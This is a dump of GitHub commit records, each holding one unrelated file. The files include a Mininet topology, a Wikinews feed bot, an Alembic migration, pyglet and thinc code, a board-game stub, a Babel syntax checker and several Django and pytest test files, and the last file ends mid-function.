host7 = self.addHost('h7')
host8 = self.addHost('h8')
switch1 = self.addSwitch('s1')
switch2 = self.addSwitch('s2')
switch3 = self.addSwitch('s3')
switch4 = self.addSwitch('s4')
switch5 = self.addSwitch('s5')
switch6 = self.addSwitch('s6')
switch7 = self.addSwitch('s7')
switch8 = self.addSwitch('s8')
switch9 = self.addSwitch('s9')
switch10 = self.addSwitch('s10')
# Add links
self.addLink(host1, switch1)
self.addLink(host2, switch1)
self.addLink(host3, switch2)
self.addLink(host4, switch2)
self.addLink(switch1, switch3)
self.addLink(switch1, switch4)
self.addLink(switch2, switch3)
self.addLink(switch2, switch4)
self.addLink(host5, switch5)
self.addLink(host6, switch5)
self.addLink(host7, switch6)
self.addLink(host8, switch6)
self.addLink(switch5, switch7)
self.addLink(switch5, switch8)
self.addLink(switch6, switch7)
self.addLink(switch6, switch8)
self.addLink(switch3, switch9)
self.addLink(switch3, switch10)
self.addLink(switch4, switch9)
self.addLink(switch4, switch10)
self.addLink(switch7, switch9)
self.addLink(switch7, switch10)
self.addLink(switch8, switch9)
self.addLink(switch8, switch10)
topos = { 'fattree': ( lambda: MyTopo() ) }
| bsd-3-clause | Python |
|
b3a16addda494428a69b80fe7d32b07520e1d292 | Create wikinews-updater.py | SiarheiGribov/pyBot,SiarheiGribov/pyBot | wikinews-updater.py | wikinews-updater.py | #!/usr/bin/env python
# -- coding: utf-8 --
import time
import requests
import login
wn_API = "https://ru.wikinews.org/w/api.php"
wp_API = "https://ru.wikipedia.org/w/api.php"
ua = {"User-agent": "pyBot/latestnews (toolforge/iluvatarbot; iluvatar@tools.wmflabs.org) requests (python3)"}
token, cookies = login.login(server="ru.wikipedia")
tasks = [
{"category": "Бизнес", "landing": "Проект:Компании/Викиновости/Бизнес", "count": 20},
{"category": "Екатеринбург", "landing": "Портал:Екатеринбург/Викиновости", "count": 7},
{"category": "Казань", "landing": "Портал:Казань/Викиновости", "count": 7},
{"category": "Музыка", "landing": "Портал:Музыка/Викиновости", "count": 10},
{"category": "ООН", "landing": "Портал:Организация Объединённых Наций/Викиновости", "count": 10},
{"category": "Республика Татарстан", "landing": "Портал:Татарстан/Викиновости", "count": 7},
{"category": "Санкт-Петербург", "landing": "Портал:Санкт-Петербург/Викиновости", "count": 10},
{"category": "Свердловская область", "landing": "Портал:Свердловская область/Викиновости", "count": 7},
{"category": "Урал", "landing": "Портал:Урал/Викиновости", "count": 7},
{"category": "Футбол", "landing": "Портал:Футбол/Викиновости", "count": 10},
{"category": "Хоккей с шайбой", "landing": "Портал:Хоккей/Викиновости/Хоккей с шайбой", "count": 10},
{"category": "Экономика", "landing": "Портал:Экономика/Викиновости", "count": 15}
]
def handler(members, task):
news = []
i = 0
for member in members:
if check(member["title"]):
i += 1
news.append("* {{news|" + str(member["title"]) + "}}")
if i >= task["count"]:
break
if len(news) > 0:
params = {
"action": "edit", "format": "json", "utf8": "1", "title": str(task["landing"]), "nocreate": 1,
"text": "\n".join(news), "summary": "Обновление ленты новостей", "token": token
}
requests.post(url=wp_API, data=params, cookies=cookies)
def check(page):
params = {
"action": "query", "format": "json", "utf8": "1", "prop": "templates", "titles": page, "tlnamespace": 10,
"tllimit": 500, "tltemplates": "Шаблон:Публиковать"
}
res = requests.post(url=wn_API, data=params, headers=ua).json()["query"]["pages"]
if len(res) > 0:
n = ""
for r in res:
n = r
break
if "templates" in res[n]:
if len(res[n]["templates"]) > 0:
return True
return False
def getData(task):
try:
params = {
"action": "query", "format": "json", "utf8": "1", "list": "categorymembers",
"cmtitle": "Категория:" + str(task["category"]), "cmprop": "timestamp|ids|title", "cmnamespace": 0,
"cmtype": "page", "cmlimit": 500, "cmsort": "timestamp", "cmdir": "older"
}
res = requests.post(url=wn_API, data=params, headers=ua).json()["query"]["categorymembers"]
except:
time.sleep(30)
getData()
else:
handler(res, task)
for task in tasks:
getData(task)
| mit | Python |
|
d0474ea69c9bcc5b07829603778e0277d1fd733a | fix moved Glottolog identifier of nepa1252 | clld/glottolog3,clld/glottolog3 | migrations/versions/1715ee79365_fix_missing_nepa1252_identifier.py | migrations/versions/1715ee79365_fix_missing_nepa1252_identifier.py | # coding=utf-8
"""fix missing nepa1252 identifier
Revision ID: 1715ee79365
Revises: 506dcac7d75
Create Date: 2015-04-15 19:34:27.655000
"""
# revision identifiers, used by Alembic.
revision = '1715ee79365'
down_revision = '506dcac7d75'
import datetime
from alembic import op
import sqlalchemy as sa
def upgrade():
id, name = 'nepa1252', 'Nepali'
insert_ident = sa.text('INSERT INTO identifier '
'(created, updated, active, version, type, description, lang, name) '
'SELECT now(), now(), true, 1, :type, :description, :lang, :name '
'WHERE NOT EXISTS (SELECT 1 FROM identifier WHERE type = :type '
'AND description = :description AND lang = :lang AND name = :name)'
).bindparams(type='name', description='Glottolog', lang='en')
insert_lang_ident = sa.text('INSERT INTO languageidentifier '
'(created, updated, active, version, language_pk, identifier_pk) '
'SELECT now(), now(), true, 1, '
'(SELECT pk FROM language WHERE id = :id), '
'(SELECT pk FROM identifier WHERE type = :type '
'AND description = :description AND lang = :lang AND name = :name) '
'WHERE NOT EXISTS (SELECT 1 FROM languageidentifier '
'WHERE language_pk = (SELECT pk FROM language WHERE id = :id) '
'AND identifier_pk = (SELECT pk FROM identifier WHERE type = :type '
'AND description = :description AND lang = :lang AND name = :name))'
).bindparams(type='name', description='Glottolog', lang='en')
op.execute(insert_ident.bindparams(name=name))
op.execute(insert_lang_ident.bindparams(id=id, name=name))
def downgrade():
pass
| mit | Python |
|
2749b4b754562c45a54b3df108c5c40c8d548038 | Create __init__.py | anvanza/invenavi,anvanza/invenavi,anvanza/invenavi | web/__init__.py | web/__init__.py | mit | Python |
||
1396ff4ab4e6664c265f97958951815a525f7823 | Remove confusing navigation tabs from header. | reddit/reddit-plugin-donate,madbook/reddit-plugin-donate,reddit/reddit-plugin-donate,madbook/reddit-plugin-donate,madbook/reddit-plugin-donate,reddit/reddit-plugin-donate | reddit_donate/pages.py | reddit_donate/pages.py | from r2.lib.pages import Reddit
from r2.lib.wrapped import Templated
class DonatePage(Reddit):
extra_stylesheets = Reddit.extra_stylesheets + ["donate.less"]
def __init__(self, title, content, **kwargs):
Reddit.__init__(
self,
title=title,
content=content,
show_sidebar=False,
**kwargs
)
def build_toolbars(self):
# get rid of tabs on the top
return []
class DonateLanding(Templated):
pass
| from r2.lib.pages import Reddit
from r2.lib.wrapped import Templated
class DonatePage(Reddit):
extra_stylesheets = Reddit.extra_stylesheets + ["donate.less"]
def __init__(self, title, content, **kwargs):
Reddit.__init__(
self,
title=title,
content=content,
show_sidebar=False,
**kwargs
)
class DonateLanding(Templated):
pass
| bsd-3-clause | Python |
307feb3f32fa31faa5754616a1e78c9ad03b0483 | test to demonstrate bug 538 | infowantstobeseen/pyglet-darwincore,infowantstobeseen/pyglet-darwincore,infowantstobeseen/pyglet-darwincore,infowantstobeseen/pyglet-darwincore,infowantstobeseen/pyglet-darwincore | tests/text/ELEMENT_CHANGE_STYLE.py | tests/text/ELEMENT_CHANGE_STYLE.py | #!/usr/bin/env python
'''Test that inline elements can have their style changed, even after text
has been deleted before them. [This triggers bug 538 if it has not yet been fixed.]
To run the test, delete the first line, one character at a time,
verifying that the element remains visible and no tracebacks are
printed to the console.
Press ESC to end the test.
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
import unittest
import pyglet
from pyglet.text import caret, document, layout
doctext = '''ELEMENT.py test document.
PLACE CURSOR AT THE END OF THE ABOVE LINE, AND DELETE ALL ITS TEXT,
BY PRESSING THE DELETE KEY REPEATEDLY.
IF THIS WORKS OK, AND THE ELEMENT (GRAY RECTANGLE) WITHIN THIS LINE
[element here]
REMAINS VISIBLE BETWEEN THE SAME CHARACTERS, WITH NO ASSERTIONS PRINTED TO
THE CONSOLE, THE TEST PASSES.
(In code with bug 538, the element sometimes moves within the text, and
eventually there is an assertion failure. Note that there is another bug,
unrelated to this one, which sometimes causes the first press of the delete
key to be ignored.)
Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Fusce venenatis
pharetra libero. Phasellus lacinia nisi feugiat felis. Sed id magna in nisl
cursus consectetuer. Aliquam aliquam lectus eu magna. Praesent sit amet ipsum
vitae nisl mattis commodo. Aenean pulvinar facilisis lectus. Phasellus sodales
risus sit amet lectus. Suspendisse in turpis. Vestibulum ac mi accumsan eros
commodo tincidunt. Nullam velit. In pulvinar, dui sit amet ullamcorper dictum,
dui risus ultricies nisl, a dignissim sapien enim sit amet tortor.
Pellentesque fringilla, massa sit amet bibendum blandit, pede leo commodo mi,
eleifend feugiat neque tortor dapibus mauris. Morbi nunc arcu, tincidunt vel,
blandit non, iaculis vel, libero. Vestibulum sed metus vel velit scelerisque
varius. Vivamus a tellus. Proin nec orci vel elit molestie venenatis. Aenean
fringilla, lorem vel fringilla bibendum, nibh mi varius mi, eget semper ipsum
ligula ut urna. Nullam tempor convallis augue. Sed at dui.
'''
element_index = doctext.index('[element here]')
doctext = doctext.replace('[element here]', '')
class TestElement(document.InlineElement):
vertex_list = None
def place(self, layout, x, y):
## assert layout.document.text[self._position] == '\x00'
### in bug 538, this fails after two characters are deleted.
self.vertex_list = layout.batch.add(4, pyglet.gl.GL_QUADS,
layout.top_group,
'v2i',
('c4B', [200, 200, 200, 255] * 4))
y += self.descent
w = self.advance
h = self.ascent - self.descent
self.vertex_list.vertices[:] = (x, y,
x + w, y,
x + w, y + h,
x, y + h)
def remove(self, layout):
self.vertex_list.delete()
del self.vertex_list
class TestWindow(pyglet.window.Window):
def __init__(self, *args, **kwargs):
super(TestWindow, self).__init__(*args, **kwargs)
self.batch = pyglet.graphics.Batch()
self.document = pyglet.text.decode_attributed(doctext)
for i in [element_index]:
self.document.insert_element(i, TestElement(60, -10, 70))
self.margin = 2
self.layout = layout.IncrementalTextLayout(self.document,
self.width - self.margin * 2, self.height - self.margin * 2,
multiline=True,
batch=self.batch)
self.caret = caret.Caret(self.layout)
self.push_handlers(self.caret)
self.set_mouse_cursor(self.get_system_mouse_cursor('text'))
def on_draw(self):
pyglet.gl.glClearColor(1, 1, 1, 1)
self.clear()
self.batch.draw()
def on_key_press(self, symbol, modifiers):
super(TestWindow, self).on_key_press(symbol, modifiers)
if symbol == pyglet.window.key.TAB:
self.caret.on_text('\t')
self.document.set_style(0, len(self.document.text), dict(bold = None)) ### trigger bug 538
class TestCase(unittest.TestCase):
def test(self):
self.window = TestWindow(##resizable=True,
visible=False)
self.window.set_visible()
pyglet.app.run()
if __name__ == '__main__':
unittest.main()
| bsd-3-clause | Python |
|
3df697b29931025a9c6f3f809eda2260d4211305 | Add LayerNorm class | spacy-io/thinc,explosion/thinc,spacy-io/thinc,explosion/thinc,explosion/thinc,spacy-io/thinc,explosion/thinc | thinc/neural/_classes/layernorm.py | thinc/neural/_classes/layernorm.py | from ... import describe
from .model import Model
def _init_to_one(W, ops):
W.fill(1.)
def _run_child_hooks(model, X, y=None):
for hook in model.child.on_data_hooks:
hook(model.child, X, y)
model.nO = model.child.nO
@describe.on_data(_run_child_hooks)
@describe.attributes(
G=describe.Weights("Scaling vector",
lambda obj: (obj.nO,), _init_to_one),
b=describe.Biases("Bias vector",
lambda obj: (obj.nO,)),
d_G=describe.Gradient("G"),
d_b=describe.Gradient("b")
)
class LayerNorm(Model):
name = 'layernorm'
def __init__(self, child, **kwargs):
self.child = child
self._layers = [child]
if 'nO' in kwargs:
self.nO = kwargs['nO']
elif getattr(child, 'nO', None):
self.nO = child.nO
self.nr_upd = 0
Model.__init__(self, **kwargs)
def predict(self, X):
X = self.child.predict(X)
N, mu, var = _get_moments(self.ops, X)
Xh = _forward(self.ops, X, mu, var)
y = Xh * self.G + self.b
return y
def begin_update(self, X, drop=0.):
X, backprop_child = self.child.begin_update(X, drop=0.)
N, mu, var = _get_moments(self.ops, X)
Xhat = _forward(self.ops, X, mu, var)
y, backprop_rescale = self._begin_update_scale_shift(Xhat)
def finish_update(dy, sgd=None):
dy = backprop_rescale(dy, sgd)
dist, sum_dy, sum_dy_dist = _get_d_moments(self.ops, dy, X, mu)
d_xhat = N * dy - sum_dy - dist * var**(-1.) * sum_dy_dist
d_xhat *= var ** (-1. / 2)
d_xhat /= N
return backprop_child(d_xhat, sgd)
drop *= getattr(self.child, 'drop_factor', 1.0)
y, bp_dropout = self.ops.dropout(y, drop)
assert y.dtype == 'float32'
return y, bp_dropout(finish_update)
def _begin_update_scale_shift(self, input__BI):
def finish_update(gradient__BI, sgd=None):
self.d_b += gradient__BI.sum(axis=0)
d_G = self.d_G
d_G += (gradient__BI * input__BI).sum(axis=0)
if sgd is not None:
sgd(self._mem.weights, self._mem.gradient, key=self.id)
return gradient__BI * self.G
return input__BI * self.G + self.b, finish_update
def _get_moments(ops, X):
mu = X.mean(axis=1, keepdims=True)
var = X.var(axis=1, keepdims=True) + 1e-08
return X.shape[0], mu, var
def _get_d_moments(ops, dy, X, mu):
dist = X-mu
return dist, ops.xp.sum(dy, axis=1, keepdims=True), ops.xp.sum(dy * dist, axis=1, keepdims=True)
def _forward(ops, X, mu, var):
return (X-mu) * var ** (-1./2.)
| mit | Python |
|
eefa1f039d935a7242bb14bdb6f672db1ff24302 | Create omega-virus.py | DrQuixote/omega_virus-python | omega-virus.py | omega-virus.py | #!/usr/bin/python
#
# Insert docopt user help menu here?
#
#
# End docopt
#
def sectors()
# Blue
# Green
# Red
# Yellow
def roomList()
# List of rooms
# Green (open rooms)
# Blue (requires blue key)
# Red (requires red key)
# Yellow (requires yellow key)
def roomContents()
# Each room can have one of:
# 1. An ADV
# 2. An access card
# 3. A Probe (more on this in a little bit)
# 4. A hazard
# 5. The virus (presumably chilling out)
# 6. Nothing at all
def items()
# Access keys (Blue, Red, Yellow)
# Decoder - yellow
# Disruptor - blue
# Negatron - red
# Probe
def players()
# Blue
# Green
# Red
# Yellow
def rng()
# Random number generator
# Values 0,1,2
def secretCode()
# Secret codes let players know where the virus is provided:
# a) They enter a room where the virus is
# b) They do not have all three weapons
# c) Should we let probes find the virus?
| cc0-1.0 | Python |
|
04f937a24279699164278d47fc5d0790a9062132 | add gunicorn.py | DoubleHYH/my_Blog,DoubleHYH/my_Blog,DoubleHYH/my_Blog | wsgi_gunicorn.py | wsgi_gunicorn.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from werkzeug.contrib.fixers import ProxyFix
from app import create_app
app = create_app()
app.wsgi_app = ProxyFix(app.wsgi_app)
if __name__ == '__main__':
app.run(host='0.0.0.0')
| mit | Python |
|
6036f03328d4908b268fa1256b552d588dbcbfc8 | Add pytest unit test for Scenario Loop model. Refs #142 | radish-bdd/radish,radish-bdd/radish | tests/unit/test_scenarioloop.py | tests/unit/test_scenarioloop.py | # -*- coding: utf-8 -*-
"""
radish
~~~~~~
Behavior Driven Development tool for Python - the root from red to green
Copyright: MIT, Timo Furrer <tuxtimo@gmail.com>
"""
from radish.scenarioloop import ScenarioLoop
from radish.iterationscenario import IterationScenario
from radish.background import Background
from radish.stepmodel import Step
def test_creating_simple_scenarioloop():
"""
Test creating a simple ScenarioLoop
"""
# given & when
scenario = ScenarioLoop(1, 'Scenario Loop', 'Iterations', 'I am a Scenario Loop', 'foo.feature', 1, parent=None,
tags=None, preconditions=None, background=None)
# then
assert scenario.id == 1
assert scenario.keyword == 'Scenario Loop'
assert scenario.iterations_keyword == 'Iterations'
assert scenario.sentence == 'I am a Scenario Loop'
assert scenario.path == 'foo.feature'
assert scenario.line == 1
assert scenario.parent is None
assert scenario.tags == []
assert scenario.preconditions == []
assert scenario.background is None
def test_building_scenarioloop_scenarios(mocker):
"""
Test building Scenarios from a Scenario Loop
"""
# given
scenario_loop = ScenarioLoop(1, 'Scenario Loop', 'Iterations', 'I am a Scenario Loop', 'foo.feature', 1, parent=None,
tags=None, preconditions=None, background=None)
# add steps
scenario_loop.steps.extend([
mocker.MagicMock(sentence='Given I have 1', path='foo.feature'),
mocker.MagicMock(sentence='And I have 2', path='foo.feature'),
mocker.MagicMock(sentence='When I add those', path='foo.feature')
])
# set iterations
scenario_loop.iterations = 2
# when - build the scenarios
scenario_loop.build_scenarios()
# then - expect 2 built Scenarios
assert len(scenario_loop.scenarios) == 2
# then - expect that Scenarios are of type ExampleScenario
assert all(isinstance(x, IterationScenario) for x in scenario_loop.scenarios)
# then - expect correct Example Scenario sentences
assert scenario_loop.scenarios[0].sentence == 'I am a Scenario Loop - iteration 0'
assert scenario_loop.scenarios[1].sentence == 'I am a Scenario Loop - iteration 1'
# then - expect correctly replaced Step sentences
assert scenario_loop.scenarios[0].steps[0].sentence == 'Given I have 1'
assert scenario_loop.scenarios[0].steps[1].sentence == 'And I have 2'
assert scenario_loop.scenarios[0].steps[2].sentence == 'When I add those'
assert scenario_loop.scenarios[1].steps[0].sentence == 'Given I have 1'
assert scenario_loop.scenarios[1].steps[1].sentence == 'And I have 2'
assert scenario_loop.scenarios[1].steps[2].sentence == 'When I add those'
def test_building_scenarioloop_scenarios_with_background(mocker):
"""
Test building Scenarios from a Scenario Loop including a Background
"""
# given
background = Background('Background', 'I am a Background', 'foo.feature', 1, parent=None)
# add some Steps
background.steps.extend([
Step(1, 'Foo', 'foo.feature', 2, background, False),
Step(2, 'Foo', 'foo.feature', 3, background, False)
])
scenario_loop = ScenarioLoop(1, 'Scenario Loop', 'Iterations', 'I am a Scenario Loop', 'foo.feature', 1, parent=None,
tags=None, preconditions=None, background=background)
# add steps
scenario_loop.steps.extend([
mocker.MagicMock(sentence='Given I have 1', path='foo.feature'),
mocker.MagicMock(sentence='And I have 2', path='foo.feature'),
mocker.MagicMock(sentence='When I add those', path='foo.feature')
])
# set iterations
scenario_loop.iterations = 2
# when - build the scenarios
scenario_loop.build_scenarios()
# then - expect ExampleScenarios to have background copy assigned
assert scenario_loop.scenarios[0].background.sentence == 'I am a Background'
assert scenario_loop.scenarios[1].background.sentence == 'I am a Background'
def test_scenarioloop_afterparse_logic(mocker):
"""
Test Scenario Loop after parse logic
"""
# given
scenario_loop = ScenarioLoop(1, 'Scenario Loop', 'Iterations', 'I am a Scenario Loop', 'foo.feature', 1, parent=None,
tags=None, preconditions=None, background=None)
# add steps
scenario_loop.steps.extend([
mocker.MagicMock(sentence='Given I have 1', path='foo.feature'),
mocker.MagicMock(sentence='And I have 2', path='foo.feature'),
mocker.MagicMock(sentence='When I add those', path='foo.feature')
])
# set iterations
scenario_loop.iterations = 2
# when
scenario_loop.after_parse()
# then - expect 2 built Scenarios
assert len(scenario_loop.scenarios) == 2
assert scenario_loop.complete is True
| mit | Python |
|
a81f39089b4c60e2cb05ea892afacbcbea6f1c5d | add tests for oxml_parser | scanny/python-pptx,kevingu1003/python-pptx,hoopes/python-pptx,AlexMooney/python-pptx,cchanrhiza/python-pptx,biggihs/python-pptx | tests/oxml/test___init__.py | tests/oxml/test___init__.py | # encoding: utf-8
"""
Test suite for pptx.oxml.__init__.py module, primarily XML parser-related.
"""
from __future__ import print_function, unicode_literals
import pytest
from lxml import etree, objectify
from pptx.oxml import oxml_parser
class DescribeOxmlParser(object):
def it_enables_objectified_xml_parsing(self, xml_bytes):
foo = objectify.fromstring(xml_bytes, oxml_parser)
assert foo.bar == 'foobar'
def it_strips_whitespace_between_elements(self, foo, stripped_xml_bytes):
xml_bytes = etree.tostring(foo)
assert xml_bytes == stripped_xml_bytes
# ===========================================================================
# fixtures
# ===========================================================================
@pytest.fixture
def foo(xml_bytes):
return objectify.fromstring(xml_bytes, oxml_parser)
@pytest.fixture
def stripped_xml_bytes():
return (
'<a:foo xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/ma'
'in"><a:bar>foobar</a:bar></a:foo>'
).encode('utf-8')
@pytest.fixture
def xml_bytes():
return (
'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
'<a:foo xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/ma'
'in">\n'
' <a:bar>foobar</a:bar>\n'
'</a:foo>\n'
).encode('utf-8')
| mit | Python |
|
f8c3feaf3f400cbcf3e04d9705f0cb36d083c6d7 | Include migratio for ProductPlan. | mblayman/lcp,mblayman/lcp,mblayman/lcp | conductor/accounts/migrations/0012_productplan.py | conductor/accounts/migrations/0012_productplan.py | # Generated by Django 2.0.9 on 2018-11-08 02:50
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [("accounts", "0011_auto_20180831_0320")]
operations = [
migrations.CreateModel(
name="ProductPlan",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("active", models.BooleanField(default=False)),
("stripe_plan_id", models.CharField(max_length=32)),
("trial_days", models.IntegerField(default=0)),
],
)
]
| bsd-2-clause | Python |
|
4db13bdab18934bebcfe5b102044f936e0eab892 | Add a place to put random stuff and a list of components as a python module. | vitorio/ocropodium,vitorio/ocropodium,vitorio/ocropodium,vitorio/ocropodium | etc/component_list.py | etc/component_list.py | COMPONENTS = [
"AdaBoost",
"AutoInvert",
"AutoMlpClassifier",
"BiggestCcExtractor",
"BinarizeByHT",
"BinarizeByOtsu",
"BinarizeByRange",
"BinarizeBySauvola",
"BitDataset",
"BitNN",
"BookStore",
"CascadedMLP",
"CenterFeatureMap",
"ConnectedComponentSegmenter",
"CurvedCutSegmenter",
"CurvedCutWithCcSegmenter",
"Degradation",
"DeskewGrayPageByRAST",
"DeskewPageByRAST",
"DocClean",
"DpSegmenter",
"EnetClassifier",
"EuclideanDistances",
"KnnClassifier",
"LatinClassifier",
"Linerec",
"LinerecExtracted",
"MetaLinerec",
"NullLinerec",
"OcroFST",
"OldBookStore",
"PageFrameRAST",
"Pages",
"RaggedDataset8",
"RaveledExtractor",
"RmBig",
"RmHalftone",
"RmUnderline",
"RowDataset8",
"ScaledImageExtractor",
"SegmentLineByCCS",
"SegmentLineByGCCS",
"SegmentLineByProjection",
"SegmentPageBy1CP",
"SegmentPageByMorphTrivial",
"SegmentPageByRAST",
"SegmentPageByRAST1",
"SegmentPageByVORONOI",
"SegmentPageByXYCUTS",
"SegmentWords",
"SimpleFeatureMap",
"SimpleGrouper",
"SkelSegmenter",
"SmartBookStore",
"SqliteBuffer",
"SqliteDataset",
"StandardExtractor",
"StandardGrouper",
"StandardPreprocessing",
"TextImageSegByLogReg",
"adaboost",
"biggestcc",
"bitdataset",
"bitnn",
"cfmap",
"cmlp",
"dpseg",
"edist",
"enet",
"knn",
"latin",
"linerec",
"linerec_extracted",
"mappedmlp",
"metalinerec",
"mlp",
"nulllinerec",
"raggeddataset8",
"raveledfe",
"rowdataset8",
"scaledfe",
"sfmap",
"simplegrouper",
"sqlitebuffer",
"sqliteds",
]
| apache-2.0 | Python |
|
f7aeb7a708ef2e40546d27d480073fdc113d639e | Add check_babel_syntax ; see note below | orezpraw/unnaturalcode,orezpraw/unnaturalcode,orezpraw/unnaturalcode,orezpraw/unnaturalcode,naturalness/unnaturalcode,naturalness/unnaturalcode,naturalness/unnaturalcode,naturalness/unnaturalcode,orezpraw/unnaturalcode,naturalness/unnaturalcode,orezpraw/unnaturalcode,orezpraw/unnaturalcode,naturalness/unnaturalcode,naturalness/unnaturalcode | unnaturalcode/check_babel_syntax.py | unnaturalcode/check_babel_syntax.py | #!/usr/bin/python
# Copyright 2017 Dhvani Patel
#
# This file is part of UnnaturalCode.
#
# UnnaturalCode is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# UnnaturalCode is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with UnnaturalCode. If not, see <http://www.gnu.org/licenses/>.
# Takes in a string of JavaScript code and checks for errors
# NOTE: FOR BABEL
import os
import subprocess
import sys
import tempfile
from compile_error import CompileError
# Method for finding index of certain characters in a string, n being the n'th occurence of the character/string
def find_nth(haystack, needle, n):
start = haystack.find(needle)
while start >= 0 and n > 1:
start = haystack.find(needle, start+len(needle))
n -= 1
return start
# Main method
def checkBabelSyntax(src):
myFile = open("toCheck.js", "w")
myFile.write(src)
myFile.close()
proc = subprocess.Popen(['node_modules/.bin/babel', 'toCheck.js', '-o', '/dev/null'], stderr=subprocess.PIPE)
streamdata, err = proc.communicate()
rc = proc.returncode
if rc == 0:
# No errors, all good
os.remove("toCheck.js")
return None
else:
# Error, disect data for constructor
colonFirInd = find_nth(err, ':', 1)
colonSecInd = find_nth(err, ':', 2)
colonThirInd = find_nth(err, ':', 3)
lineBegin = find_nth(err, '(', 1)
lineEnd = find_nth(err, ')', 1)
fileName = err[colonFirInd+2:colonSecInd]
line = int(err[lineBegin+1:colonThirInd])
column = int(err[colonThirInd+1:lineEnd])
errorname = err[0:colonFirInd]
flagStart = find_nth(err, '>', 1)
temp = err[flagStart:]
ind = find_nth(temp, '\n', 1)
textBefore = err[colonSecInd+2:lineBegin-1]
textAfter = err[flagStart+26:flagStart+ind]
text = textBefore + ' ' + textAfter
errorObj = CompileError(fileName, line, column, None, text, errorname)
os.remove("toCheck.js")
return [errorObj]
| agpl-3.0 | Python |
|
3196eeb928c5715ba20d21d0d16a3087938bf6c9 | Add tools/compute_bottleneck.py. | openimages/dataset,openimages/dataset,openimages/dataset | tools/compute_bottleneck.py | tools/compute_bottleneck.py | #!/usr/bin/env python
#
# Copyright 2016 The Open Images Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
#
# This script takes an Inception v3 checkpoint, runs the classifier
# on the image and prints the values from the bottleneck layer.
# Example:
# $ wget -O /tmp/cat.jpg https://farm6.staticflickr.com/5470/9372235876_d7d69f1790_b.jpg
# $ ./tools/compute_bottleneck.py /tmp/cat.jpg
#
# Make sure to download the ANN weights and support data with:
# $ ./tools/download_data.sh
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import math
import sys
import os.path
import numpy as np
import tensorflow as tf
from tensorflow.contrib.slim.python.slim.nets import inception
from tensorflow.python.framework import ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import variables
from tensorflow.python.training import saver as tf_saver
from tensorflow.python.training import supervisor
slim = tf.contrib.slim
FLAGS = None
def PreprocessImage(image_path):
"""Load and preprocess an image.
Args:
image_path: path to an image
Returns:
An ops.Tensor that produces the preprocessed image.
"""
if not os.path.exists(image_path):
tf.logging.fatal('Input image does not exist %s', image_path)
img_data = tf.gfile.FastGFile(image_path).read()
# Decode Jpeg data and convert to float.
img = tf.cast(tf.image.decode_jpeg(img_data, channels=3), tf.float32)
# Make into a 4D tensor by setting a 'batch size' of 1.
img = tf.expand_dims(img, [0])
img = tf.image.crop_and_resize(
img,
# Whole image
tf.constant([0, 0, 1.0, 1.0], shape=[1, 4]),
# One box
tf.constant([0], shape=[1]),
# Target size is image_size x image_size
tf.constant([FLAGS.image_size, FLAGS.image_size], shape=[2]))
# Center the image about 128.0 (which is done during training) and normalize.
img = tf.mul(img, 1.0/127.5)
return tf.sub(img, 1.0)
def main(args):
if not os.path.exists(FLAGS.checkpoint):
tf.logging.fatal(
'Checkpoint %s does not exist. Have you download it? See tools/download_data.sh',
FLAGS.checkpoint)
g = tf.Graph()
with g.as_default():
input_image = PreprocessImage(FLAGS.image_path[0])
with slim.arg_scope(inception.inception_v3_arg_scope()):
logits, end_points = inception.inception_v3(
input_image, num_classes=FLAGS.num_classes, is_training=False)
bottleneck = end_points['PreLogits']
init_op = control_flow_ops.group(variables.initialize_all_variables(),
variables.initialize_local_variables(),
data_flow_ops.initialize_all_tables())
saver = tf_saver.Saver()
sess = tf.Session()
saver.restore(sess, FLAGS.checkpoint)
# Run the evaluation on the image
bottleneck_eval = np.squeeze(sess.run(bottleneck))
first = True
for val in bottleneck_eval:
if not first:
sys.stdout.write(",")
first = False
sys.stdout.write('{:.3f}'.format(val))
sys.stdout.write('\n')
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--checkpoint', type=str, default='data/2016_08/model.ckpt',
help='Checkpoint to run inference on.')
parser.add_argument('--image_size', type=int, default=299,
help='Image size to run inference on.')
parser.add_argument('--num_classes', type=int, default=6012,
help='Number of output classes.')
parser.add_argument('image_path', nargs=1, default='')
FLAGS = parser.parse_args()
tf.app.run()
| apache-2.0 | Python |
|
d7568806a81c52f268673422dbbe60117f4b490c | Add plugins test cases | menecio/django-api-bouncer | tests/test_plugin.py | tests/test_plugin.py | from rest_framework import status
from rest_framework.test import APITestCase
from django.contrib.auth import get_user_model
from api_bouncer.models import Api
User = get_user_model()
class ConsumerKeyTests(APITestCase):
def setUp(self):
self.superuser = User.objects.create_superuser(
'john',
'john@localhost.local',
'john123john'
)
self.user = User.objects.create_user(
'jane',
'jane@localhost.local',
'jane123jane'
)
self.example_api = Api.objects.create(
name='example-api',
hosts=['example.com'],
upstream_url='https://httpbin.org'
)
self.url = '/apis/{}/plugins/'
def test_api_add_plugin(self):
"""
Ensure we can add a plugin to an api as superusers.
"""
self.client.login(username='john', password='john123john')
url = self.url.format(self.example_api.name)
data = {
'name': 'key-auth',
}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(self.example_api.plugins.count(), 1)
self.assertEqual(self.example_api.plugins.first().name, data['name'])
def test_api_add_plugin_403(self):
